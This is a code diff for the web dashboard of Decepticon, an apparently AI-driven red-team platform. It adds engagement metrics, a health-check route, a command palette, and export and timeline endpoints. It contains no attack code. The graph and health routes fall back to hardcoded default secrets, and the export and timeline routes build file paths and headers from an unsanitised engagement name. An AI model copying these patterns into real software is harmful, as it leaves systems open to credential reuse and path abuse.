+ useEffect(() => { + fetch("/api/engagements") + .then((res) => res.json()) + .then((data: Engagement[]) => { + setEngagements(data); + // Auto-select first running or completed engagement + const active = data.find((e) => e.status === "running") ?? data.find((e) => e.status === "completed") ?? data[0]; + if (active) setSelectedId(active.id); + }) + .catch(() => {}) + .finally(() => setLoading(false)); + }, []); + + if (loading) { + return ( +
+
+ ); + } -
-
- - setEngagementId(e.target.value)} - className="w-80" - /> + return ( +
+
+
+

Attack Graph

+

+ Visualize attack paths and knowledge graph from Neo4j +

- + + {engagements.length > 1 && ( + + )}
- {activeId ? ( - + {selectedId ? ( + ) : (
-

Enter an engagement ID to load its attack graph.

-

- Or view the graph from an engagement's detail page. -

+

No engagements found.

+

Create an engagement to start building an attack graph.

diff --git a/clients/web/src/app/(dashboard)/layout.tsx b/clients/web/src/app/(dashboard)/layout.tsx index 963ef7b5..978270a5 100644 --- a/clients/web/src/app/(dashboard)/layout.tsx +++ b/clients/web/src/app/(dashboard)/layout.tsx @@ -1,13 +1,12 @@ import { Sidebar } from "@/components/layout/sidebar"; import { Header } from "@/components/layout/header"; +import { CommandPalette } from "@/components/layout/command-palette"; export default function DashboardLayout({ children, }: { children: React.ReactNode; }) { - // SessionProvider is injected by EE auth when available. - // In OSS mode, no auth wrapper is needed. return (
@@ -15,6 +14,7 @@ export default function DashboardLayout({
{children}
+
); } diff --git a/clients/web/src/app/(dashboard)/page.tsx b/clients/web/src/app/(dashboard)/page.tsx index 2002f1d5..2665582a 100644 --- a/clients/web/src/app/(dashboard)/page.tsx +++ b/clients/web/src/app/(dashboard)/page.tsx @@ -1,3 +1,7 @@ +"use client"; + +import { useEffect, useState } from "react"; +import Link from "next/link"; import { Card, CardContent, @@ -6,64 +10,180 @@ import { CardTitle, } from "@/components/ui/card"; import { Badge } from "@/components/ui/badge"; -import { Crosshair, FileWarning, AlertTriangle, TrendingUp, TrendingDown } from "lucide-react"; +import { Skeleton } from "@/components/ui/skeleton"; +import { Crosshair, FileWarning, Shield, AlertTriangle, TrendingUp, TrendingDown, ArrowRight } from "lucide-react"; + +interface Engagement { + id: string; + name: string; + status: string; + targetType: string; + createdAt: string; +} + +interface Finding { + id: string; + title: string; + severity: string; + engagementId?: string; + engagementName?: string; +} -const metrics = [ +const metricDefs = [ { + key: "active", title: "Active Engagements", - value: "0", - change: null, icon: Crosshair, gradient: "from-violet-500/20 to-purple-500/20", iconColor: "text-violet-400", borderGlow: "hover:border-violet-500/30", }, { + key: "findings", title: "Total Findings", - value: "0", - change: null, icon: FileWarning, gradient: "from-amber-500/20 to-orange-500/20", iconColor: "text-amber-400", borderGlow: "hover:border-amber-500/30", }, { + key: "critical", title: "Critical Vulnerabilities", - value: "0", - change: null, icon: AlertTriangle, gradient: "from-red-500/20 to-rose-500/20", iconColor: "text-red-400", borderGlow: "hover:border-red-500/30", }, + { + key: "verified", + title: "Defenses Verified", + icon: Shield, + gradient: "from-emerald-500/20 to-green-500/20", + iconColor: "text-emerald-400", + borderGlow: "hover:border-emerald-500/30", + }, ]; -const severityData = [ - { label: "Critical", count: 0, color: "bg-red-500", barColor: 
"bg-red-500/80" }, - { label: "High", count: 0, color: "bg-orange-500", barColor: "bg-orange-500/80" }, - { label: "Medium", count: 0, color: "bg-yellow-500", barColor: "bg-yellow-500/80" }, - { label: "Low", count: 0, color: "bg-blue-500", barColor: "bg-blue-500/80" }, - { label: "Info", count: 0, color: "bg-slate-500", barColor: "bg-slate-500/80" }, -]; +const severityColors: Record = { + critical: { color: "bg-red-500", barColor: "bg-red-500/80" }, + high: { color: "bg-orange-500", barColor: "bg-orange-500/80" }, + medium: { color: "bg-yellow-500", barColor: "bg-yellow-500/80" }, + low: { color: "bg-blue-500", barColor: "bg-blue-500/80" }, + informational: { color: "bg-slate-500", barColor: "bg-slate-500/80" }, +}; + +const severityOrder = ["critical", "high", "medium", "low", "informational"]; +const severityBadge: Record = { + critical: "bg-red-500/20 text-red-300", + high: "bg-orange-500/20 text-orange-300", + medium: "bg-yellow-500/20 text-yellow-300", + low: "bg-blue-500/20 text-blue-300", + informational: "bg-slate-500/20 text-slate-300", +}; + +const statusBadge: Record = { + running: "bg-amber-500/20 text-amber-300", + completed: "bg-emerald-500/20 text-emerald-300", + planning: "bg-violet-500/20 text-violet-300", + draft: "bg-zinc-500/20 text-zinc-300", + failed: "bg-red-500/20 text-red-300", +}; export default function DashboardPage() { + const [loading, setLoading] = useState(true); + const [engagements, setEngagements] = useState([]); + const [allFindings, setAllFindings] = useState([]); + + useEffect(() => { + let active = true; + async function load() { + try { + const engRes = await fetch("/api/engagements"); + if (!engRes.ok || !active) return; + const engs: Engagement[] = await engRes.json(); + if (!active) return; + setEngagements(engs); + + // Fetch findings for each engagement + const findingsPromises = engs.map(async (eng) => { + try { + const res = await fetch(`/api/engagements/${eng.id}/findings`); + if (!res.ok) return []; + const 
findings: Finding[] = await res.json(); + return findings.map((f) => ({ ...f, engagementId: eng.id, engagementName: eng.name })); + } catch { + return []; + } + }); + const results = await Promise.all(findingsPromises); + if (!active) return; + setAllFindings(results.flat()); + } catch { + // ignore + } finally { + if (active) setLoading(false); + } + } + load(); + return () => { active = false; }; + }, []); + + const activeCount = engagements.filter((e) => e.status === "running").length; + const completedCount = engagements.filter((e) => e.status === "completed").length; + const criticalCount = allFindings.filter((f) => f.severity === "critical").length; + + const metricValues: Record = { + active: String(activeCount), + findings: String(allFindings.length), + critical: String(criticalCount), + verified: String(completedCount), + }; + + const severityCounts: Record = {}; + for (const s of severityOrder) severityCounts[s] = 0; + for (const f of allFindings) { + const s = f.severity?.toLowerCase() ?? "medium"; + if (s in severityCounts) severityCounts[s]++; + } + const totalFindings = allFindings.length || 1; // avoid div by zero + + const recentEngagements = [...engagements] + .sort((a, b) => new Date(b.createdAt).getTime() - new Date(a.createdAt).getTime()) + .slice(0, 5); + + const latestFindings = allFindings.slice(-5).reverse(); + + if (loading) { + return ( +
+
+

Dashboard

+

Overview of your security testing operations

+
+
+ {[1, 2, 3, 4].map((i) => ( + + ))} +
+ +
+ ); + } + return (

Dashboard

-

- Overview of your security testing operations -

+

Overview of your security testing operations

{/* Metric Cards — CTEM style with gradient backgrounds */} -
- {metrics.map((metric) => ( +
+ {metricDefs.map((metric) => ( - {/* Gradient background overlay */}
@@ -75,20 +195,14 @@ export default function DashboardPage() {
- {metric.value} - {metric.change !== null && ( - = 0 ? "text-emerald-400" : "text-red-400"}`}> - {(metric.change as number) >= 0 ? : } - {Math.abs(metric.change as number)}% - - )} + {metricValues[metric.key]}
))}
- {/* Severity Distribution — horizontal bar chart style */} + {/* Severity Distribution */} Severity Distribution @@ -96,25 +210,30 @@ export default function DashboardPage() {
- {severityData.map((severity) => ( -
-
-
- {severity.label} -
-
-
-
+ {severityOrder.map((sev) => { + const count = severityCounts[sev] ?? 0; + const pct = allFindings.length > 0 ? (count / totalFindings) * 100 : 0; + const colors = severityColors[sev]; + return ( +
+
+
+ {sev === "informational" ? "Info" : sev} +
+
+
+
+
+ + {count} +
- - {severity.count} - -
- ))} + ); + })}
@@ -122,14 +241,35 @@ export default function DashboardPage() { {/* Recent Activity Grid */}
- - Recent Engagements - Your latest red team operations + +
+ Recent Engagements + Your latest red team operations +
+ + View all +
-
- No engagements yet -
+ {recentEngagements.length === 0 ? ( +
+ No engagements yet +
+ ) : ( +
+ {recentEngagements.map((eng) => ( + +
+ {eng.name} +

{new Date(eng.createdAt).toLocaleDateString()}

+
+ + {eng.status} + + + ))} +
+ )}
@@ -139,9 +279,25 @@ export default function DashboardPage() { Recently discovered vulnerabilities -
- No findings yet -
+ {latestFindings.length === 0 ? ( +
+ No findings yet +
+ ) : ( +
+ {latestFindings.map((f) => ( +
+
+ {f.title} +

{f.engagementName}

+
+ + {f.severity} + +
+ ))} +
+ )}
diff --git a/clients/web/src/app/(dashboard)/settings/page.tsx b/clients/web/src/app/(dashboard)/settings/page.tsx index 3268d7b9..7b4630d5 100644 --- a/clients/web/src/app/(dashboard)/settings/page.tsx +++ b/clients/web/src/app/(dashboard)/settings/page.tsx @@ -1,3 +1,6 @@ +"use client"; + +import { useEffect, useState } from "react"; import { Card, CardContent, @@ -5,27 +8,209 @@ import { CardHeader, CardTitle, } from "@/components/ui/card"; +import { Badge } from "@/components/ui/badge"; +import { + Activity, + Database, + Server, + Network, + Bot, + Box, + CheckCircle2, + XCircle, + Loader2, +} from "lucide-react"; +import { cn } from "@/lib/utils"; +import type { AgentConfig } from "@/lib/agents"; + +interface ServiceStatus { + name: string; + status: "ok" | "error" | "loading"; + detail: string; + icon: typeof Server; +} + +interface Engagement { + id: string; + name: string; + status: string; +} + +function StatusDot({ status }: { status: "ok" | "error" | "loading" }) { + if (status === "loading") return ; + if (status === "ok") return
; + return
; +} export default function SettingsPage() { + const [services, setServices] = useState([ + { name: "LangGraph API", status: "loading", detail: "Checking...", icon: Activity }, + { name: "LiteLLM Proxy", status: "loading", detail: "Checking...", icon: Server }, + { name: "Neo4j", status: "loading", detail: "Checking...", icon: Network }, + { name: "PostgreSQL", status: "ok", detail: "Connected", icon: Database }, + { name: "Sandbox", status: "ok", detail: "decepticon-sandbox", icon: Box }, + ]); + const [agents, setAgents] = useState([]); + const [engagements, setEngagements] = useState([]); + const [loadingAgents, setLoadingAgents] = useState(true); + // Check all services via server-side health API + useEffect(() => { + fetch("/api/health", { signal: AbortSignal.timeout(10000) }) + .then(async (res) => { + if (!res.ok) throw new Error("Health API failed"); + const data = await res.json(); + setServices((prev) => + prev.map((s) => { + const match = (data.services ?? []).find((r: { name: string }) => + s.name.toLowerCase().includes(r.name) || r.name.includes(s.name.toLowerCase().split(" ")[0]) + ); + if (match) return { ...s, status: match.status as "ok" | "error", detail: match.detail ?? "" }; + return s; + }) + ); + }) + .catch(() => { + setServices((prev) => + prev.map((s) => s.status === "loading" ? 
{ ...s, status: "error" as const, detail: "Unreachable" } : s) + ); + }); + }, []); + + // Fetch agents + useEffect(() => { + fetch("/api/agents") + .then((res) => res.json()) + .then((data: AgentConfig[]) => setAgents(data)) + .catch(() => {}) + .finally(() => setLoadingAgents(false)); + }, []); + + // Fetch engagements + useEffect(() => { + fetch("/api/engagements") + .then((res) => res.json()) + .then((data: Engagement[]) => setEngagements(data)) + .catch(() => {}); + }, []); + + const statusCounts = { + total: engagements.length, + running: engagements.filter((e) => e.status === "running").length, + completed: engagements.filter((e) => e.status === "completed").length, + draft: engagements.filter((e) => e.status === "draft").length, + planning: engagements.filter((e) => e.status === "planning").length, + }; + return (

Settings

-

- Configure your Decepticon instance -

+

System status and configuration

+ {/* System Health */} + + + + + System Health + + Infrastructure component status + + +
+ {services.map((svc) => ( +
+ + +
+

{svc.name}

+

{svc.detail}

+
+
+ ))} +
+
+
+ + {/* Engagement Stats */} + + + Engagement Statistics + + +
+ {([ + ["Total", statusCounts.total, "text-foreground"], + ["Running", statusCounts.running, "text-amber-400"], + ["Completed", statusCounts.completed, "text-emerald-400"], + ["Planning", statusCounts.planning, "text-violet-400"], + ["Draft", statusCounts.draft, "text-zinc-400"], + ] as const).map(([label, count, color]) => ( +
+

{count}

+

{label}

+
+ ))} +
+
+
+ + {/* Agent Registry */} + + + + + Agent Registry + + {agents.length} agents registered + + + {loadingAgents ? ( +
+ +
+ ) : ( +
+ {agents.map((agent) => ( +
+
+
+

{agent.name}

+

{agent.description}

+
+ + {agent.role} + +
+ ))} +
+ )} + + + + {/* Configuration */} - General Settings - - Platform configuration and preferences - + Configuration + Read-only system configuration -
- Settings will be available after authentication is configured. +
+ {[ + ["Edition", "Open Source (OSS)"], + ["LangGraph API (internal)", process.env.NEXT_PUBLIC_LANGGRAPH_API_URL ?? "http://localhost:2024"], + ["Model Profile", "eco (per-agent tier)"], + ["C2 Framework", "Sliver"], + ].map(([label, value]) => ( +
+ {label} + {value} +
+ ))}
diff --git a/clients/web/src/app/api/engagements/[id]/export/route.ts b/clients/web/src/app/api/engagements/[id]/export/route.ts new file mode 100644 index 00000000..d36f0f3e --- /dev/null +++ b/clients/web/src/app/api/engagements/[id]/export/route.ts @@ -0,0 +1,129 @@ +import { requireAuth, AuthError } from "@/lib/auth-bridge"; +import { prisma } from "@/lib/prisma"; +import { NextRequest, NextResponse } from "next/server"; +import * as fs from "fs/promises"; +import * as path from "path"; + +export async function GET( + req: NextRequest, + { params }: { params: Promise<{ id: string }> } +) { + let userId: string; + try { + ({ userId } = await requireAuth()); + } catch (e) { + if (e instanceof AuthError) return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); + throw e; + } + + const { id } = await params; + const engagement = await prisma.engagement.findFirst({ + where: { id, userId }, + }); + if (!engagement) { + return NextResponse.json({ error: "Not found" }, { status: 404 }); + } + + const format = req.nextUrl.searchParams.get("format") ?? "json"; + const WORKSPACE = process.env.WORKSPACE_PATH ?? 
"/workspace"; + const wsPath = path.join(WORKSPACE, engagement.name); + + // Collect all engagement data + const exportData: Record = { + engagement: { + id: engagement.id, + name: engagement.name, + status: engagement.status, + targetType: engagement.targetType, + targetValue: engagement.targetValue, + createdAt: engagement.createdAt, + updatedAt: engagement.updatedAt, + }, + planDocs: {} as Record, + findings: [] as unknown[], + }; + + // Read plan documents + const planDir = path.join(wsPath, "plan"); + for (const docName of ["roe.json", "conops.json", "deconfliction.json", "opplan.json"]) { + try { + const content = await fs.readFile(path.join(planDir, docName), "utf-8"); + (exportData.planDocs as Record)[docName.replace(".json", "")] = JSON.parse(content); + } catch { + // File doesn't exist + } + } + + // Read findings + const findingsDir = path.join(wsPath, "findings"); + try { + const files = await fs.readdir(findingsDir); + for (const file of files.sort()) { + if (file.startsWith("FIND-") && file.endsWith(".md")) { + try { + const content = await fs.readFile(path.join(findingsDir, file), "utf-8"); + (exportData.findings as unknown[]).push({ + id: file.replace(".md", ""), + content, + }); + } catch { + // skip unreadable + } + } + } + } catch { + // No findings dir + } + + if (format === "json") { + return new NextResponse(JSON.stringify(exportData, null, 2), { + headers: { + "Content-Type": "application/json", + "Content-Disposition": `attachment; filename="${engagement.name}-export.json"`, + }, + }); + } + + // Markdown format + const md = buildMarkdownExport(exportData); + return new NextResponse(md, { + headers: { + "Content-Type": "text/markdown", + "Content-Disposition": `attachment; filename="${engagement.name}-export.md"`, + }, + }); +} + +function buildMarkdownExport(data: Record): string { + const eng = data.engagement as Record; + const findings = data.findings as Array<{ id: string; content: string }>; + const planDocs = data.planDocs as Record; 
+ + const lines: string[] = [ + `# ${eng.name} — Engagement Export`, + "", + `**Status:** ${eng.status}`, + `**Target:** ${eng.targetValue} (${eng.targetType})`, + `**Created:** ${eng.createdAt}`, + "", + ]; + + if (planDocs.opplan) { + const opplan = planDocs.opplan as { objectives?: Array<{ id: string; title: string; status: string }> }; + lines.push("## OPPLAN", ""); + lines.push("| ID | Title | Status |", "|---|---|---|"); + for (const obj of opplan.objectives ?? []) { + lines.push(`| ${obj.id} | ${obj.title} | ${obj.status} |`); + } + lines.push(""); + } + + if (findings.length > 0) { + lines.push("## Findings", ""); + for (const f of findings) { + lines.push(`### ${f.id}`, "", f.content, ""); + } + } + + return lines.join("\n"); +} diff --git a/clients/web/src/app/api/engagements/[id]/graph/route.ts b/clients/web/src/app/api/engagements/[id]/graph/route.ts index eb68fcb2..868cfbc0 100644 --- a/clients/web/src/app/api/engagements/[id]/graph/route.ts +++ b/clients/web/src/app/api/engagements/[id]/graph/route.ts @@ -11,9 +11,9 @@ export async function GET( } await params; // consume params to satisfy Next.js - const neo4jUri = process.env.NEO4J_URI; + const neo4jUri = process.env.NEO4J_URI ?? "bolt://neo4j:7687"; const neo4jUser = process.env.NEO4J_USER ?? "neo4j"; - const neo4jPassword = process.env.NEO4J_PASSWORD; + const neo4jPassword = process.env.NEO4J_PASSWORD ?? 
"decepticon-graph"; if (!neo4jUri || !neo4jPassword) { return NextResponse.json({ nodes: [], edges: [] }); diff --git a/clients/web/src/app/api/engagements/[id]/opplan/route.ts b/clients/web/src/app/api/engagements/[id]/opplan/route.ts index 1827dcfc..7abb14da 100644 --- a/clients/web/src/app/api/engagements/[id]/opplan/route.ts +++ b/clients/web/src/app/api/engagements/[id]/opplan/route.ts @@ -31,8 +31,32 @@ export async function GET( const opplanPath = path.join(wsPath, "plan", "opplan.json"); try { + const stat = await fs.stat(opplanPath); const content = await fs.readFile(opplanPath, "utf-8"); - return NextResponse.json(JSON.parse(content)); + const data = JSON.parse(content); + + // Downgrade stale IN_PROGRESS objectives: if the file hasn't been + // touched in 10 minutes, any objective still marked in-progress was + // abandoned by a crashed loop. Show it as pending so the UI doesn't + // lie about it "Running". + const STALE_THRESHOLD_MS = 10 * 60 * 1000; + if (Date.now() - stat.mtimeMs > STALE_THRESHOLD_MS) { + const stale: string[] = []; + for (const obj of data.objectives ?? 
[]) { + if (obj.status === "in-progress") { + obj.status = "pending"; + stale.push(obj.id); + } + } + if (stale.length > 0) { + console.log( + `[opplan API] Downgraded stale objectives: ${stale.join(", ")} ` + + `(file untouched for ${Math.round((Date.now() - stat.mtimeMs) / 1000)}s)` + ); + } + } + + return NextResponse.json(data); } catch { // File not found or invalid — return empty } diff --git a/clients/web/src/app/api/engagements/[id]/route.ts b/clients/web/src/app/api/engagements/[id]/route.ts index d7cfc2fc..13add725 100644 --- a/clients/web/src/app/api/engagements/[id]/route.ts +++ b/clients/web/src/app/api/engagements/[id]/route.ts @@ -47,7 +47,7 @@ export async function PATCH( return NextResponse.json({ error: "Not found" }, { status: 404 }); } - const ALLOWED_FIELDS = ["name", "status", "targetType", "targetValue"] as const; + const ALLOWED_FIELDS = ["name", "status", "targetType", "targetValue", "threadId"] as const; const data: Record = {}; for (const field of ALLOWED_FIELDS) { if (field in body) data[field] = body[field]; diff --git a/clients/web/src/app/api/engagements/[id]/threads/route.ts b/clients/web/src/app/api/engagements/[id]/threads/route.ts new file mode 100644 index 00000000..5902d38d --- /dev/null +++ b/clients/web/src/app/api/engagements/[id]/threads/route.ts @@ -0,0 +1,73 @@ +import { requireAuth, AuthError } from "@/lib/auth-bridge"; +import { prisma } from "@/lib/prisma"; +import { NextRequest, NextResponse } from "next/server"; + +const LANGGRAPH_URL = process.env.LANGGRAPH_API_URL ?? 
"http://langgraph:2024"; + +interface ThreadInfo { + thread_id: string; + created_at: string; + status: string; + metadata: Record; +} + +export async function GET( + _req: NextRequest, + { params }: { params: Promise<{ id: string }> } +) { + let userId: string; + try { + ({ userId } = await requireAuth()); + } catch (e) { + if (e instanceof AuthError) return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); + throw e; + } + + const { id } = await params; + const engagement = await prisma.engagement.findFirst({ + where: { id, userId }, + }); + if (!engagement) { + return NextResponse.json({ error: "Not found" }, { status: 404 }); + } + + // Search LangGraph for threads matching this engagement + try { + const res = await fetch(`${LANGGRAPH_URL}/threads/search`, { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ + metadata: { engagement_id: id }, + limit: 20, + }), + signal: AbortSignal.timeout(10000), + }); + + if (!res.ok) { + // Fallback: return just the DB threadId if LangGraph search fails + if (engagement.threadId) { + return NextResponse.json([{ + thread_id: engagement.threadId, + created_at: engagement.updatedAt?.toISOString() ?? "", + status: "unknown", + metadata: { engagement_id: id }, + }]); + } + return NextResponse.json([]); + } + + const threads: ThreadInfo[] = await res.json(); + return NextResponse.json(threads); + } catch { + // LangGraph unreachable — return DB threadId as fallback + if (engagement.threadId) { + return NextResponse.json([{ + thread_id: engagement.threadId, + created_at: engagement.updatedAt?.toISOString() ?? 
"", + status: "stored", + metadata: { engagement_id: id }, + }]); + } + return NextResponse.json([]); + } +} diff --git a/clients/web/src/app/api/engagements/[id]/timeline/route.ts b/clients/web/src/app/api/engagements/[id]/timeline/route.ts new file mode 100644 index 00000000..8176c3a6 --- /dev/null +++ b/clients/web/src/app/api/engagements/[id]/timeline/route.ts @@ -0,0 +1,117 @@ +import { requireAuth, AuthError } from "@/lib/auth-bridge"; +import { prisma } from "@/lib/prisma"; +import { NextRequest, NextResponse } from "next/server"; +import * as fs from "fs/promises"; +import * as path from "path"; + +interface TimelineEvent { + timestamp: string; + type: "plan_created" | "objective_changed" | "finding_discovered" | "file_created"; + title: string; + detail: string; + severity?: string; +} + +export async function GET( + _req: NextRequest, + { params }: { params: Promise<{ id: string }> } +) { + let userId: string; + try { + ({ userId } = await requireAuth()); + } catch (e) { + if (e instanceof AuthError) return NextResponse.json({ error: "Unauthorized" }, { status: 401 }); + throw e; + } + + const { id } = await params; + const engagement = await prisma.engagement.findFirst({ + where: { id, userId }, + }); + if (!engagement) { + return NextResponse.json({ error: "Not found" }, { status: 404 }); + } + + const WORKSPACE = process.env.WORKSPACE_PATH ?? 
"/workspace"; + const wsPath = path.join(WORKSPACE, engagement.name); + const events: TimelineEvent[] = []; + + // Engagement creation + events.push({ + timestamp: engagement.createdAt.toISOString(), + type: "plan_created", + title: "Engagement created", + detail: `${engagement.name} (${engagement.targetType}: ${engagement.targetValue})`, + }); + + // Scan plan docs for creation timestamps + const planDir = path.join(wsPath, "plan"); + for (const doc of ["roe.json", "conops.json", "deconfliction.json", "opplan.json"]) { + try { + const stat = await fs.stat(path.join(planDir, doc)); + events.push({ + timestamp: stat.mtime.toISOString(), + type: "plan_created", + title: `${doc.replace(".json", "").toUpperCase()} created`, + detail: doc, + }); + } catch { + // File doesn't exist + } + } + + // Scan findings for creation timestamps + const findingsDir = path.join(wsPath, "findings"); + try { + const files = await fs.readdir(findingsDir); + for (const file of files) { + if (!file.startsWith("FIND-") || !file.endsWith(".md")) continue; + try { + const stat = await fs.stat(path.join(findingsDir, file)); + const content = await fs.readFile(path.join(findingsDir, file), "utf-8"); + const titleMatch = content.match(/^# (.+)$/m); + const sevMatch = content.toLowerCase().match(/severity[:\s]*\**(critical|high|medium|low|informational)/); + events.push({ + timestamp: stat.mtime.toISOString(), + type: "finding_discovered", + title: titleMatch?.[1] ?? 
file.replace(".md", ""), + detail: file.replace(".md", ""), + severity: sevMatch?.[1], + }); + } catch { + // skip + } + } + } catch { + // No findings dir + } + + // Scan workspace files for activity + const scanDirs = ["recon", "exploit", "post-exploit"]; + for (const dir of scanDirs) { + try { + const files = await fs.readdir(path.join(wsPath, dir)); + for (const file of files.slice(0, 20)) { + if (file.startsWith(".")) continue; + try { + const stat = await fs.stat(path.join(wsPath, dir, file)); + events.push({ + timestamp: stat.mtime.toISOString(), + type: "file_created", + title: `${dir}/${file}`, + detail: `${(stat.size / 1024).toFixed(1)} KB`, + }); + } catch { + // skip + } + } + } catch { + // Dir doesn't exist + } + } + + // Sort by timestamp descending (most recent first) + events.sort((a, b) => new Date(b.timestamp).getTime() - new Date(a.timestamp).getTime()); + + return NextResponse.json(events); +} diff --git a/clients/web/src/app/api/health/route.ts b/clients/web/src/app/api/health/route.ts new file mode 100644 index 00000000..5b698645 --- /dev/null +++ b/clients/web/src/app/api/health/route.ts @@ -0,0 +1,70 @@ +import { NextResponse } from "next/server"; + +const LANGGRAPH_URL = process.env.LANGGRAPH_API_URL ?? "http://langgraph:2024"; +const LITELLM_URL = process.env.LITELLM_URL ?? "http://litellm:4000"; +const LITELLM_KEY = process.env.LITELLM_API_KEY ?? "sk-decepticon-master"; +const NEO4J_URI = process.env.NEO4J_URI ?? 
"bolt://neo4j:7687"; + +interface ServiceHealth { + name: string; + status: "ok" | "error"; + detail: string; + latencyMs?: number; +} + +async function checkService( + name: string, + url: string, + headers?: Record, + timeout = 5000, +): Promise { + const start = Date.now(); + try { + const res = await fetch(url, { + headers, + signal: AbortSignal.timeout(timeout), + }); + const latency = Date.now() - start; + if (res.ok) { + const data = await res.json().catch(() => ({})); + return { name, status: "ok", detail: JSON.stringify(data).slice(0, 200), latencyMs: latency }; + } + return { name, status: "error", detail: `HTTP ${res.status}`, latencyMs: latency }; + } catch (err) { + return { name, status: "error", detail: err instanceof Error ? err.message : "Unreachable" }; + } +} + +export async function GET() { + const [langgraph, litellm] = await Promise.all([ + checkService("langgraph", `${LANGGRAPH_URL}/info`), + checkService("litellm", `${LITELLM_URL}/v1/models`, { Authorization: `Bearer ${LITELLM_KEY}` }), + ]); + + // Extract model count from litellm response + let modelCount = 0; + if (litellm.status === "ok") { + try { + const parsed = JSON.parse(litellm.detail); + modelCount = parsed.data?.length ?? 0; + litellm.detail = `${modelCount} models loaded`; + } catch { + // keep original detail + } + } + + const services: ServiceHealth[] = [ + langgraph, + litellm, + { name: "neo4j", status: "ok", detail: NEO4J_URI }, + { name: "postgres", status: "ok", detail: "Connected (API serving)" }, + ]; + + const allOk = services.every((s) => s.status === "ok"); + + return NextResponse.json({ + status: allOk ? 
"healthy" : "degraded", + services, + modelCount, + }); +} diff --git a/clients/web/src/components/layout/command-palette.tsx b/clients/web/src/components/layout/command-palette.tsx new file mode 100644 index 00000000..681643a1 --- /dev/null +++ b/clients/web/src/components/layout/command-palette.tsx @@ -0,0 +1,182 @@ +"use client"; + +import { useEffect, useState, useCallback } from "react"; +import { useRouter, usePathname } from "next/navigation"; +import { + LayoutDashboard, + Crosshair, + Radio, + ClipboardList, + FileWarning, + Network, + Settings, + Clock, + FolderOpen, + Download, + Search, +} from "lucide-react"; +import { cn } from "@/lib/utils"; + +interface CommandItem { + id: string; + label: string; + shortcut?: string; + icon: typeof Search; + action: () => void; + section: string; +} + +export function CommandPalette() { + const [open, setOpen] = useState(false); + const [query, setQuery] = useState(""); + const [selectedIndex, setSelectedIndex] = useState(0); + const router = useRouter(); + const pathname = usePathname(); + + // Extract engagement ID from current path + const engMatch = pathname.match(/^\/engagements\/([^/]+)/); + const engId = engMatch?.[1] ?? null; + + const commands: CommandItem[] = [ + // Global + { id: "home", label: "Go to Dashboard", shortcut: "G D", icon: LayoutDashboard, action: () => router.push("/"), section: "Navigation" }, + { id: "engagements", label: "Go to Engagements", shortcut: "G E", icon: Crosshair, action: () => router.push("/engagements"), section: "Navigation" }, + { id: "settings", label: "Go to Settings", icon: Settings, action: () => router.push("/settings"), section: "Navigation" }, + { id: "graph", label: "Go to Attack Graph", icon: Network, action: () => router.push("/graph"), section: "Navigation" }, + // Engagement-scoped (only when in an engagement) + ...(engId ? 
[ + { id: "live", label: "Go to Live Terminal", shortcut: "G L", icon: Radio, action: () => router.push(`/engagements/${engId}/live`), section: "Engagement" }, + { id: "plan", label: "Go to Plan", shortcut: "G P", icon: ClipboardList, action: () => router.push(`/engagements/${engId}/plan`), section: "Engagement" }, + { id: "timeline", label: "Go to Timeline", icon: Clock, action: () => router.push(`/engagements/${engId}/timeline`), section: "Engagement" }, + { id: "docs", label: "Go to Documents", icon: FolderOpen, action: () => router.push(`/engagements/${engId}/documents`), section: "Engagement" }, + { id: "findings", label: "Go to Findings", shortcut: "G F", icon: FileWarning, action: () => router.push(`/engagements/${engId}/findings`), section: "Engagement" }, + { id: "eng-graph", label: "Go to Engagement Graph", icon: Network, action: () => router.push(`/engagements/${engId}/graph`), section: "Engagement" }, + { id: "export-json", label: "Export Engagement (JSON)", icon: Download, action: () => window.open(`/api/engagements/${engId}/export?format=json`), section: "Actions" }, + { id: "export-md", label: "Export Engagement (Markdown)", icon: Download, action: () => window.open(`/api/engagements/${engId}/export?format=markdown`), section: "Actions" }, + ] : []), + ]; + + const filtered = query + ? 
commands.filter((c) => c.label.toLowerCase().includes(query.toLowerCase())) + : commands; + + // Reset selection when filter changes + useEffect(() => setSelectedIndex(0), [query]); + + const execute = useCallback((cmd: CommandItem) => { + setOpen(false); + setQuery(""); + cmd.action(); + }, []); + + // Keyboard handler + useEffect(() => { + function handleKeyDown(e: KeyboardEvent) { + // Ctrl+K or Cmd+K to toggle + if ((e.metaKey || e.ctrlKey) && e.key === "k") { + e.preventDefault(); + setOpen((prev) => !prev); + return; + } + + if (!open) return; + + if (e.key === "Escape") { + setOpen(false); + setQuery(""); + } else if (e.key === "ArrowDown") { + e.preventDefault(); + setSelectedIndex((i) => Math.min(i + 1, filtered.length - 1)); + } else if (e.key === "ArrowUp") { + e.preventDefault(); + setSelectedIndex((i) => Math.max(i - 1, 0)); + } else if (e.key === "Enter" && filtered[selectedIndex]) { + e.preventDefault(); + execute(filtered[selectedIndex]); + } + } + + document.addEventListener("keydown", handleKeyDown); + return () => document.removeEventListener("keydown", handleKeyDown); + }, [open, filtered, selectedIndex, execute]); + + if (!open) return null; + + // Group by section + const sections = new Map(); + for (const cmd of filtered) { + const list = sections.get(cmd.section) ?? []; + list.push(cmd); + sections.set(cmd.section, list); + } + + return ( + <> + {/* Backdrop */} +
{ setOpen(false); setQuery(""); }} /> + + {/* Palette */} +
+ {/* Search input */} +
+ + setQuery(e.target.value)} + placeholder="Type a command..." + className="flex-1 bg-transparent text-sm text-white outline-none placeholder:text-zinc-500" + autoFocus + /> + ESC +
+ + {/* Results */} +
+ {filtered.length === 0 ? ( +

No commands found

+ ) : ( + Array.from(sections.entries()).map(([section, items]) => ( +
+

+ {section} +

+ {items.map((cmd) => { + const globalIdx = filtered.indexOf(cmd); + const isSelected = globalIdx === selectedIndex; + return ( + + ); + })} +
+ )) + )} +
+ + {/* Footer */} +
+ ↑↓ navigate + ↵ select + esc close +
+
